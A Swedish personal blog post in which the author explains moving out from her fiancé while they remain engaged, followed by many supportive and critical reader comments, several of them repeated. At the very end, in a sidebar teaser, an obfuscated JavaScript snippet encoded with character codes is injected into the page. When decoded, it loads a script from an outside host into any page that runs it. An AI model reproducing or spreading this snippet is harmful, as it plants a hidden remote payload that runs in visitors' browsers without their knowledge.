Därför flyttar jag ifrån Jonas….

Hej!

Jag har försökt att skriva detta inlägget HUR många gånger som helst….. Börjat skriva några rader, och sedan raderat allt igen.  

-Det gör SÅ ont!💔

78C6034D-F3A0-49A2-9652-7AAFF89A4B09

Det är just det. Nackdelen med offentligheten genom bloggen…..

Jag skjutit upp detta i flera veckor nu. Undvikit att dela med mig, då vi behövt ”landa”.

 Men grejen är att bloggen är en inspirations-sajt där jag delar med mig av tips, träning, och allt annat skoj som jag jobbar med. MEN, den är också en ”dagbok” där ni ganska naket och avskalat får följa mig och min vardag.

Där många uppskattar igenkännande-faktorn och följt min resa genom olika situationer….  I både med och motgång.

Därför har senaste veckorna varit svåra. Väldigt svåra. Då jag inte riktigt vetat hur jag skulle förhålla mig här inne. Vad ska jag skriva om när jag inte kan blogg om vardagen så som den sett ut sista tiden. 

Just nu, är det ett känslomässigt kaos inombords. Blandade känslor av både hopp, förtvivlan. Sömnlösa nätter och okontrollerat med tårar emellanåt.

I det stora hela mår jag bättre än på många år. Men i relationen är det tyvärr inte så😞

Jag har i ett försök att undvika och ”ducka” för ämnet,  börjat blogga väldigt opersonligt, inte kunnat lägga upp de storys hemifrån oss, som jag brukar på instagram tex…. Vilket såklart ni reflekterar över. Därav mina korta svar i kommentarsfältet osv. 

Just för att undvika det jag nu ska berätta. Jag behövde några veckor själv att ”landa” i detta. 

Jag har valt att flytta ifrån Jonas.

Så, de senaste veckorna har varit upp och ner. Flytt. Med allt praktisk som följer…. Känslomässigt, Ni fattar. Upp och ner. 

Jag träffade Jonas efter att jag levt ensam i nästan sex år. Jag vet att jag klarar mig själv. Jag trivdes väldigt bra med det. Jag blev bekväm med att bara tänka på Lilleman och mig själv.

Men plötsligt så var kärlek där. När jag som minst anade det så träffade jag min Indian. Min långhåriga indian ❤️

Raka motsatsen till mig själv. Vi är så olika varandra att det nästan blev lite komiskt. Men olika kan också vara väldigt bra. Så länge man delar grundvärderingar osv. Vi blev lite som Yin & Yang.

Jonas fyllde det tomrum vi saknade. Vi skapade en egen liten familj. Jonas friade, den lyckligaste stunden i mitt liv (efter att Ludvig föddes) Vi planerade bröllop, barn och framtid. 

MEN. Precis som livet kan vara så är det inte alltid en dans på rosor. Vi har också haft det tufft. Min vardag, med pendling mellan två boenden och vardagar sliter enormt på mig/oss. Jonas turnerar och reser också varje vecka…. Det finns många saker som spelar in.

Bara tanken på att skaffa barn, som då också skulle behöva pendla mellan två städer, slitas mellan oss båda pga av min situation. Det knäckte mig. Det gjorde mig fullkomligt livrädd! 

Jag känner mig otillräcklig. Hur jag än gör så räcker jag inte till, 100%. För någon. Det är en sak av flera som spelar in. 

MEN. Just nu finns inte längre några alternativ, än det jag precis gjort, flyttat. Jag vill inte gå in på mer detaljer än jag gör i detta inlägg.

Jag tvekade länge innan jag bestämde mig för att flytta ifrån Jonas….. Inget enkelt beslut, och inte heller gemensamt.

Men jag kände att jag inte hade något val. Behövde bryta den onda cirkel vi hamnat i. 

OLYMPUS DIGITAL CAMERA

 Jonas och Ludvigs relation är outstanding ❤️ Kunde inte fått en bättre styvpappa än Jonas.

Jag bor nu i en jätte mysig lägenhet i Vasastan. En charmig mini 3:a som jag försöker ”boa” in mig i. 

Jonas har och är ett jätte stöd för mig/oss. Även i flytten. Just precis just nu i skrivande stund så sitter jag i passagerarsätet och Jonas kör🙏🏻

Vi är påväg ner till öland. Jonas stannar npgra dagar. Vi ska  ”bara vara” med Ludvig ….  bara vi,  Tillsammans. 

Jag vet inte mer än så just nu…..  Har inga fler svar att ge. Tar en dag i taget.

Vi är fortfarande förlovade, och bär våra ringar. En symbol för oss själva, som visar att vi fortfarande kämpar, att vi INTE har gett upp.  

Men jag behöver luft.

D42EA755-4C5A-41E7-9295-80D713E594CB

Jag tänker/vill inte prata mer om det. Av respekt mot Jonas, mig själv och ”oss”.

Men nu vet ni. Så tar vi det därifrån…..

/My Martens 

170 Komentarer

 1. Har nästan förstått att något var på gång…….Hoppas du/ni trots allt finner ro och harmoni i ert liv….många kramar ❤

 2. Styrkekramar ❤️ Kämpa på, allt löser sej alltid, förr eller senare.
  Njut nu av lugnet på ön och av att bara vara alla 3! ❤️

 3. Hej My!
  Jag brukar inre kommentera bloggar och inlägg, sist jag gjorde det var nog när du berättade om din magop. Så det var ett tag sen…? Tycker du är bland de mest jordnära och ”normala” människor i offentligheten. Det är inte bara guld och glaumor för nån! Du är så rak, ärlig, klok och jordnära (säger jag utan att ha träffat dig?) Och jag känner igen mig i så mycket, som tex din magoperation och utmattning. 2 saker som jag också har varit/är med om. Även separation med barn inblandat.
  Önskar dig allt det bästa, hur än det blir! Hoppas ni kan komma Till ro och bara vara nu! Ta hand om er och framförallt dig själv! (Som de säger på flygplanen, sätt på dig din egen mask innan du hjälper andra)
  Stor kram till dig!❤❤

 4. Gammal tant har allt anat detta.
  Bra ändå att du berättar, för dig själv, för Jonas och för alla andra så blir det inga spekulationer.
  Hoppas ni har berättat för lillkillen.
  Ta det från var du / ni är nu.
  Tänk bara på att bromsa livet ibland oavsett om du är ensam eller ej.
  Lycka till framöver. Med allt vad du än tar dig för. Kram ?

 5. Men det är inte hela världen att ha var sin bostad men ändå vara ihop. Det är väl ganska naturligt att man har var sitt boende när du lever ett så flackande liv. Vad är grejen liksom?

  • ”Vad är grejen liksom”??
   Har du läst Mys inlägg?
   Dom planerar för bröllop och barn.
   Kanske inte optimalt bo på olika ställen då.

   • P, har du nånsin drabbats av passion och hetta ? Tror att detta kommer att vara Forever? Hoppas det för de är väldigt nice❤️

   • Till P! Vad är grejen liksom? Ja det kan man verkligen fråga sig! Idag är det snarare regel än undantag att man har olika boenden när man har barn sedan tidigare o flänger o far hela tiden o i synnerhet funkar det aldrig att flytta hem till ngn:s hem, båda måste bryta upp o starta ngt tillsammans om det ska funka!

    • Nej, man måste ingenting. Hur kan du tvärsäkert säga det?? Många hamnar i sitsen att man flyttar in i den ena personens boende p g a praktiska och bostadsekonomiska skäl och det kan bli toppen. Andra hittar nytt boende och flyttar ihop men det funkar inte ändå. Det finns massor av orsaker till att man kan ha svårt att leva ihop trots att man vill.
     Hoppas detta löser sig på bästa sätt och vad som är bäst kommer att visa sig efterhand.

 6. Ibland behöver man bli särbo ett tag för att få ny kraft , energi till varandra. Ni har de svårare såklart med ditt boende varannan v i sthlm & öland. Ja din son blir större & kanske han själv vill gå på högstadie, gymnasiet i sthlm sen då blir de mkt enklare. Men ett litet barn om ni skulle få det så kanske jonas kan utgå mer från kalmar de v du är här. Du är extremt grym som offrade dig för att din lilleman skulle slippa rättegång, bråk pga boende frågan.
  Önskar er all lycka oavsett om ni hittar en lösning & flyttar ihop igen eller bryter upp , ni är jättefina ihop er lilla familj . Styrkekram

  • Fast det var ju lilleman som själv önskade gå i skola på Öland ihop med sin bror, den rättegången hade gått på barnets vilja. Svårt att se att hav väljer annat till gymnasie hans uppväxt och trygghet är ju trots allt på Öland.

 7. Har nästan förstått att något var på gång…….Hoppas du/ni trots allt finner ro och harmoni i ert liv….många kramar ❤

 8. Att vara särbo kan vara ett bra alternativ ❤️.
  Ni är unga och hinner med både bröllop och barn ännu! Få en stadig grund att stå på så blir det nog bra????

 9. All styrka till er! 🌹🌹🌹 Sluta inte blogga personligt, en mix av jobb o privat är det som ger blogg drivkraft! 🙂

 10. Men vad tråkigt? Hoppas verkligen att det ordnar upp sig för Er och vem vet kanske är särbo-lösningen ett sätt att hitta tillbaka till varandra eller så är det början på en ny konstellation av Er relation . Behöver ju inte vara dåligt att inte bo ihop
  Fint att ni fortfarande umgås
  Kram

 11. Hej My,
  Har nästan förstått det, men inte velar fråga av respekt för ert privatliv. Tycker nu verkar så kloka båda två. Jag och min man fick inte livet att fungera under samma tak av flera anledningar och flyttade isär. För mig kändes det dom jordens undergång då. Men med facit i hand var det de bästa vi gjort! Vi var särbos i två år och jag tyckte det var fanastiskt. Bästa av två världar, jag fick vara självständig och rå om mig själv, vi tog vara på tiden tillsammans och hade inga gräl om vardagliga saker. Till slut köpte vi ett gemensamt hus, det kändes rätt men ibland kan jag fortfarande sakna tiden som särbo.
  Hoppas de blir bra för er, oavsett vad ni bestämmer er för. Kram ?

 12. Styrkekramar ❤️ Kämpa på, allt löser sej alltid, förr eller senare.
  Njut nu av lugnet på ön och av att bara vara alla 3! ❤️

 13. Hej My!
  Jag brukar inre kommentera bloggar och inlägg, sist jag gjorde det var nog när du berättade om din magop. Så det var ett tag sen…😆 Tycker du är bland de mest jordnära och ”normala” människor i offentligheten. Det är inte bara guld och glaumor för nån! Du är så rak, ärlig, klok och jordnära (säger jag utan att ha träffat dig😁) Och jag känner igen mig i så mycket, som tex din magoperation och utmattning. 2 saker som jag också har varit/är med om. Även separation med barn inblandat.
  Önskar dig allt det bästa, hur än det blir! Hoppas ni kan komma Till ro och bara vara nu! Ta hand om er och framförallt dig själv! (Som de säger på flygplanen, sätt på dig din egen mask innan du hjälper andra)
  Stor kram till dig!❤❤

 14. Gammal tant har allt anat detta.
  Bra ändå att du berättar, för dig själv, för Jonas och för alla andra så blir det inga spekulationer.
  Hoppas ni har berättat för lillkillen.
  Ta det från var du / ni är nu.
  Tänk bara på att bromsa livet ibland oavsett om du är ensam eller ej.
  Lycka till framöver. Med allt vad du än tar dig för. Kram 💕

 15. Men det är inte hela världen att ha var sin bostad men ändå vara ihop. Det är väl ganska naturligt att man har var sitt boende när du lever ett så flackande liv. Vad är grejen liksom?

  • ”Vad är grejen liksom”??
   Har du läst Mys inlägg?
   Dom planerar för bröllop och barn.
   Kanske inte optimalt bo på olika ställen då.

   • P, har du nånsin drabbats av passion och hetta ? Tror att detta kommer att vara Forever? Hoppas det för de är väldigt nice❤️

   • Till P! Vad är grejen liksom? Ja det kan man verkligen fråga sig! Idag är det snarare regel än undantag att man har olika boenden när man har barn sedan tidigare o flänger o far hela tiden o i synnerhet funkar det aldrig att flytta hem till ngn:s hem, båda måste bryta upp o starta ngt tillsammans om det ska funka!

    • Nej, man måste ingenting. Hur kan du tvärsäkert säga det?? Många hamnar i sitsen att man flyttar in i den ena personens boende p g a praktiska och bostadsekonomiska skäl och det kan bli toppen. Andra hittar nytt boende och flyttar ihop men det funkar inte ändå. Det finns massor av orsaker till att man kan ha svårt att leva ihop trots att man vill.

     Hoppas detta löser sig på bästa sätt och vad som är bäst kommer att visa sig efterhand.

 16. Ibland behöver man bli särbo ett tag för att få ny kraft , energi till varandra. Ni har de svårare såklart med ditt boende varannan v i sthlm & öland. Ja din son blir större & kanske han själv vill gå på högstadie, gymnasiet i sthlm sen då blir de mkt enklare. Men ett litet barn om ni skulle få det så kanske jonas kan utgå mer från kalmar de v du är här. Du är extremt grym som offrade dig för att din lilleman skulle slippa rättegång, bråk pga boende frågan.
  Önskar er all lycka oavsett om ni hittar en lösning & flyttar ihop igen eller bryter upp , ni är jättefina ihop er lilla familj . Styrkekram

  • Fast det var ju lilleman som själv önskade gå i skola på Öland ihop med sin bror, den rättegången hade gått på barnets vilja. Svårt att se att hav väljer annat till gymnasie hans uppväxt och trygghet är ju trots allt på Öland.

 17. Hej. Må väl
  Vet inte hur ni har det. Men alltid tänkt att ni inte passar ihop. Men det gör ni kanske? Var rädd om dig. En dag i taget. Kram ?

 18. Livet som särbos är inte alls tokigt när man bestämt sig för det. Det kan till och med vara riktigt bra att längta efter varandra. Det som kan vara problematiskt är om det kommer in en tredje part i sammanhanget. Det är alltid bäst att verkligen fundera och utvärdera sin relation innan man överger den. Alla former av gräsmattor tenderar att gulna om man inte sköter om dem, hur gröna och frodiga de än är när de är nya… Men viktigast är förstås att känslorna finns, annars blir det sällan riktigt bra i relationen.
  Allt blir bra till slut. Kram!

 19. Fina My. Ta den tid du behöver. Gör det som du mår bra av. Skickar stärkande kramar till Er allihopa. / Sara 💕

 20. Att vara särbo kan vara ett bra alternativ ❤️.
  Ni är unga och hinner med både bröllop och barn ännu! Få en stadig grund att stå på så blir det nog bra👍🏻👍🏻

 21. All kärlek till er My. Du skall se att det ordnar sig till det bästa oavsett vad ”det bästa” blir i slutändan. Du är en härlig person av det man läser i din blogg och jag är säker på att det är ditt rätta jag!!!
  Väldigt modigt av dig att ta det steget och tänka på dig själv i första hand, för om inte du mår bra mår inte människor omkring heller bra!
  Du är inte bara modig utan också klok! All kärlek och det bästa för er alla!
  //Berith

 22. Men vad tråkigt😞 Hoppas verkligen att det ordnar upp sig för Er och vem vet kanske är särbo-lösningen ett sätt att hitta tillbaka till varandra eller så är det början på en ny konstellation av Er relation . Behöver ju inte vara dåligt att inte bo ihop
  Fint att ni fortfarande umgås
  Kram

 23. Hej My,
  Har nästan förstått det, men inte velar fråga av respekt för ert privatliv. Tycker nu verkar så kloka båda två. Jag och min man fick inte livet att fungera under samma tak av flera anledningar och flyttade isär. För mig kändes det dom jordens undergång då. Men med facit i hand var det de bästa vi gjort! Vi var särbos i två år och jag tyckte det var fanastiskt. Bästa av två världar, jag fick vara självständig och rå om mig själv, vi tog vara på tiden tillsammans och hade inga gräl om vardagliga saker. Till slut köpte vi ett gemensamt hus, det kändes rätt men ibland kan jag fortfarande sakna tiden som särbo.
  Hoppas de blir bra för er, oavsett vad ni bestämmer er för. Kram 💜

 24. Tråkigt men det är så livet är. Rörligt och oförutsägbart.
  ”Nackdelen med offentligheten genom bloggen…..” nämner du…. ja det finns ju ett förträffligt alternativ om du tycker det är jobbigt. Du dras till en värld där det njuts av att omskrivas och få rubriker. Gillar du inte det så har du själv valt fel. Ingen har gjort det åt dig. Det här inlägget skapar ju också rubriker och det är du själv som valt det. Du är helt medveten i vad du gör. Låt inte som att du tycker det är jobbigt då.

  • Men snälla…inte ens ett sånt här inlägg där My är ledsen över sin livssituation, kan få dig att låta bli att kräkas på henne ??‍♀️

 25. Det är nog bra för dig! Jag är varken psykolog eller expert på era liv men två personer som har röriga liv på varsitt håll brukar inte fungera.
  Tror att du behöver någon lugn, trygg och vuxen person med en ordnad vardag så att ni inte är två som behöver flänga hit och dit. Det underlättar ju om man har ungefär samma dygnsrytm också.
  Särbo skulle aldrig funka för mig i alla fall. Här satsas det eller också inte. Vi är alla olika.
  Önskar dig all lycka till!

 26. Hej. Må väl
  Vet inte hur ni har det. Men alltid tänkt att ni inte passar ihop. Men det gör ni kanske? Var rädd om dig. En dag i taget. Kram 🍀

 27. Livet som särbos är inte alls tokigt när man bestämt sig för det. Det kan till och med vara riktigt bra att längta efter varandra. Det som kan vara problematiskt är om det kommer in en tredje part i sammanhanget. Det är alltid bäst att verkligen fundera och utvärdera sin relation innan man överger den. Alla former av gräsmattor tenderar att gulna om man inte sköter om dem, hur gröna och frodiga de än är när de är nya… Men viktigast är förstås att känslorna finns, annars blir det sällan riktigt bra i relationen.
  Allt blir bra till slut. Kram!

 28. Du får faaaan inte ge upp nu. Kämpa. Ta time out. Känn kärlek och saknad men inte press! Varför föll ni för varandra?! Opposites attracts? You go for it girl. Keep your faith in YOU TOGETHER!
  Kärlek från Skåne//Åsa

 29. All kärlek till er My. Du skall se att det ordnar sig till det bästa oavsett vad ”det bästa” blir i slutändan. Du är en härlig person av det man läser i din blogg och jag är säker på att det är ditt rätta jag!!!
  Väldigt modigt av dig att ta det steget och tänka på dig själv i första hand, för om inte du mår bra mår inte människor omkring heller bra!
  Du är inte bara modig utan också klok! All kärlek och det bästa för er alla!
  //Berith

 30. Tråkigt men det är så livet är. Rörligt och oförutsägbart.

  ”Nackdelen med offentligheten genom bloggen…..” nämner du…. ja det finns ju ett förträffligt alternativ om du tycker det är jobbigt. Du dras till en värld där det njuts av att omskrivas och få rubriker. Gillar du inte det så har du själv valt fel. Ingen har gjort det åt dig. Det här inlägget skapar ju också rubriker och det är du själv som valt det. Du är helt medveten i vad du gör. Låt inte som att du tycker det är jobbigt då.

  • Men snälla…inte ens ett sånt här inlägg där My är ledsen över sin livssituation, kan få dig att låta bli att kräkas på henne 🤦🏼‍♀️

 31. Det är nog bra för dig! Jag är varken psykolog eller expert på era liv men två personer som har röriga liv på varsitt håll brukar inte fungera.

  Tror att du behöver någon lugn, trygg och vuxen person med en ordnad vardag så att ni inte är två som behöver flänga hit och dit. Det underlättar ju om man har ungefär samma dygnsrytm också.

  Särbo skulle aldrig funka för mig i alla fall. Här satsas det eller också inte. Vi är alla olika.

  Önskar dig all lycka till!

 32. Aaaaah. men jag måste skriva igen. Ni tar er igenom även om det är svårt och ser omöjligt ut just nu. Ge plats och våga din kärlek, er kärlek ta plats! Love overcomes all! ?
  Kämpa!
  Ge inte upp .
  Kärleken är värd att kämpa för även om den tar krokiga å tuffa vägar. Ni är ” One of a kind”.
  Kram//Å

 33. Hej My!
  Trist att läsa och ibland ställer jag mig frågan om du vet var du har dig själv?! Jag vet såklart inget om dig privat, men genom att följa dig så tänker man ibland på att din diagnos lyser igenom i vissa val du gör. Med detta inte sagt att du gjort fel val osv.. men man undrar som läsare. Hoppas det blir bra för er alla! Stor kram

 34. Så fint beskrivet, och så sorgligt på samma gång! Ibland blir det inte som man tänkt sig.. Det kan bli bättre till och med. Trots att vägen ibland är kringlig! Hälsa Jonas också! Vet hur det känns att inte själv ha valt.. Oavsett hur ni väljer i framtiden.. sköt om er och var snälla både mot er själva och varandra. Kärleken är allt som i slutänden betyder något. Oavsett om man väljer att vara och leva ihop.. eller inte.. Kram till er båda

 35. Jag tror ni gör rätt My. Utifrån vad du berättat så har Jonas verkat lite omogen i att ta hänsyn till dig/dina behov katter osv. Kanske gick ni lite för snabbt fram och då kan man alltid backa, bli särbos och ta det i lugnare takt. Reda ut hur ni vill bo och hur ni ska ha det längre fram. I små steg. Det fixar ni om ni båda vill!

 36. Du får faaaan inte ge upp nu. Kämpa. Ta time out. Känn kärlek och saknad men inte press! Varför föll ni för varandra?! Opposites attracts? You go for it girl. Keep your faith in YOU TOGETHER!
  Kärlek från Skåne//Åsa

 37. Aaaaah. men jag måste skriva igen. Ni tar er igenom även om det är svårt och ser omöjligt ut just nu. Ge plats och våga din kärlek, er kärlek ta plats! Love overcomes all! 🙂
  Kämpa!
  Ge inte upp .
  Kärleken är värd att kämpa för även om den tar krokiga å tuffa vägar. Ni är ” One of a kind”.
  Kram//Å

 38. Hej My!
  Trist att läsa och ibland ställer jag mig frågan om du vet var du har dig själv?! Jag vet såklart inget om dig privat, men genom att följa dig så tänker man ibland på att din diagnos lyser igenom i vissa val du gör. Med detta inte sagt att du gjort fel val osv.. men man undrar som läsare. Hoppas det blir bra för er alla! Stor kram

 39. Så fint beskrivet, och så sorgligt på samma gång! Ibland blir det inte som man tänkt sig.. Det kan bli bättre till och med. Trots att vägen ibland är kringlig! Hälsa Jonas också! Vet hur det känns att inte själv ha valt.. Oavsett hur ni väljer i framtiden.. sköt om er och var snälla både mot er själva och varandra. Kärleken är allt som i slutänden betyder något. Oavsett om man väljer att vara och leva ihop.. eller inte.. Kram till er båda

 40. Jag tror ni gör rätt My. Utifrån vad du berättat så har Jonas verkat lite omogen i att ta hänsyn till dig/dina behov katter osv. Kanske gick ni lite för snabbt fram och då kan man alltid backa, bli särbos och ta det i lugnare takt. Reda ut hur ni vill bo och hur ni ska ha det längre fram. I små steg. Det fixar ni om ni båda vill!

 41. Ta hand om dig och lilleman för det är det viktigaste. Vad vi och vem som sköter sig framöver får man ju se 😉

 42. Hur ska du orka med allt detta också nu när du ska starta din egen studio. Tycker Jonas verkar väldigt förstående fast beslutet inte var hans. Hoppas sonen tar denna ändring i vardagen bra.

 43. Bara Du och Jonas vet vad som är bäst för Er! Det kom en liten tår hos mig nu vid läsningen men jag vet att ”den svåra stunden stannar aldrig kvar”.
  Livet är inte oändligt men det börjar alltid om….jag vet det.
  Kram!

 44. Hur ska du orka med allt detta också nu när du ska starta din egen studio. Tycker Jonas verkar väldigt förstående fast beslutet inte var hans. Hoppas sonen tar denna ändring i vardagen bra.

 45. Bara Du och Jonas vet vad som är bäst för Er! Det kom en liten tår hos mig nu vid läsningen men jag vet att ”den svåra stunden stannar aldrig kvar”.
  Livet är inte oändligt men det börjar alltid om….jag vet det.
  Kram!

 46. håller tummarna för att den tid du nu får själv kommer göra att det blir bra för er två. ni kommer bli ännu lyckligare som par ?

 47. Har nästan väntat på detta. Med era olika liv och alla dina resor mm kan det vara svårt att bo ihop.
  Hoppas ni fåren härlig tid på Öland nu i alla fall. Lycka til med ditt nya liv.

 48. håller tummarna för att den tid du nu får själv kommer göra att det blir bra för er två. ni kommer bli ännu lyckligare som par 🙂

 49. Har nästan väntat på detta. Med era olika liv och alla dina resor mm kan det vara svårt att bo ihop.

  Hoppas ni fåren härlig tid på Öland nu i alla fall. Lycka til med ditt nya liv.

  • Herregud vilken kommentar …..
   Har man ingenting snällt att säga brukar min mamma säga att det är bättre att vara tyst.
   Man skall behandla andra som man vill bli behandlad själv, förmodligen med kärlek och respekt!
   Tänk om du varit i samma situation.
   Kram till dig anna i alla fall <3

 50. Det kommer säkert ordna sig till det bästa. Tycker att det är bra att du vågar lyssna inåt vad som behövs ❤️ Kram

  • Herregud vilken kommentar …..

   Har man ingenting snällt att säga brukar min mamma säga att det är bättre att vara tyst.
   Man skall behandla andra som man vill bli behandlad själv, förmodligen med kärlek och respekt!
   Tänk om du varit i samma situation.

   Kram till dig anna i alla fall <3

 51. Måste vara väldigt jobbigt för Jonas att vara så ”nära” dig och Ludvig i vardagen fast han var emot beslutet.

 52. Det kommer säkert ordna sig till det bästa. Tycker att det är bra att du vågar lyssna inåt vad som behövs ❤️ Kram

 53. Måste vara väldigt jobbigt för Jonas att vara så ”nära” dig och Ludvig i vardagen fast han var emot beslutet.

 54. Hej My..
  Jag är verkligen ett levande exempel på att särbo is tha shit ?
  Vi bodde ihop typ 18 mån, sen gick vi ”isär”, men lever numera som särbos, bästa som hänt just oss iaf..

 55. Hej My..
  Jag är verkligen ett levande exempel på att särbo is tha shit 😉
  Vi bodde ihop typ 18 mån, sen gick vi ”isär”, men lever numera som särbos, bästa som hänt just oss iaf..

 56. Jag tycker att ni gör detta bra om det inte fungerar
  att bo ihop.Kärleken övervinner detta och kan till och med bli starkare.
  Ni är fortfarande förlovade. Kan hälsa på varandra när ni känner att ni vill. Slippa det vardagliga tjafset. Jag tycker att det låter mycket bra.
  Jag tror på er.
  Kram och hälsa Jonas.

 57. Jag tycker att ni gör detta bra om det inte fungerar
  att bo ihop.Kärleken övervinner detta och kan till och med bli starkare.
  Ni är fortfarande förlovade. Kan hälsa på varandra när ni känner att ni vill. Slippa det vardagliga tjafset. Jag tycker att det låter mycket bra.
  Jag tror på er.
  Kram och hälsa Jonas.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/